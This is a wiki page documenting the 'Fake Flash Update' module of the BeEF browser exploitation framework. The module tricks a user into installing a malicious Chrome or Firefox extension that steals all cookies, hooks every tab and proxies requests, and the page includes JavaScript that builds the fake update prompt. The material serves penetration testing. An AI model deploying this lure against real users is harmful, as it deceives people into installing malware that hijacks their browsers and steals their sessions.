Skip to content

Module: Fake Flash Update

Nbblrr edited this page Jan 3, 2013 · 8 revisions


  • Description:
    • Prompts the user to install an update to Adobe Flash Player.The file to be delivered could be a Chrome or Firefox extension.
    • A Chrome extension has privileged access and can do a whole lot..
      • Access all tabs and inject beef into all tabs
      • Use hooked browser as a proxy to do cross domain requests
      • Get all cookies including HTTPonly cookies
    • Note : the Chrome extension delivery will work on Chrome <= 20. From Chrome 21 things changed in terms of how extensions can be loaded.
    • The Firefox extension is disabling PortBanning (ports 20,21,22,25,110,143), enabling Java, overriding the UserAgent and the default home/new_tab pages. See extensions/ipec/files/LinkTargetFinder dirrectory for the Firefox extension source.
  • Authors: mh, antisnatchor
  • Browsers: All (User is notified)
  • Parameters :
    • Splash Image : Main image used for fake message (default is adobe reader logo)
    • BeEF payload root path : URL of the BeEF server should be here
    • Payload : Choose the payload (Chrome or Firefox)
  • Code

##Internal Working

This module basically add a fake message in the center of the screen and redirect to the browser extension when the user clicks on it :

var div = document.createElement('div');
div.setAttribute('id', 'splash');
div.setAttribute('style', 'position:absolute; top:30%; left:40%;');
div.setAttribute('align', 'center');
div.innerHTML= '<a href=\'' + payload + '\' ><img src=\''+ image +'\' /></a>';
    $j("#splash").click(function () {
      $j(this).hide();'<%= @command_url %>', <%= @command_id %>, 'answer=user has accepted');


Command :

Fake message :

Error with Chrome > 20 :

Alert message on Firefox 17 :


  • Blocked with recent version of Chrome (> 20)
  • It would be usefull to automatically detect if the browser is chrome or firefox and remove the payload option


Clone this wiki locally
You can’t perform that action at this time.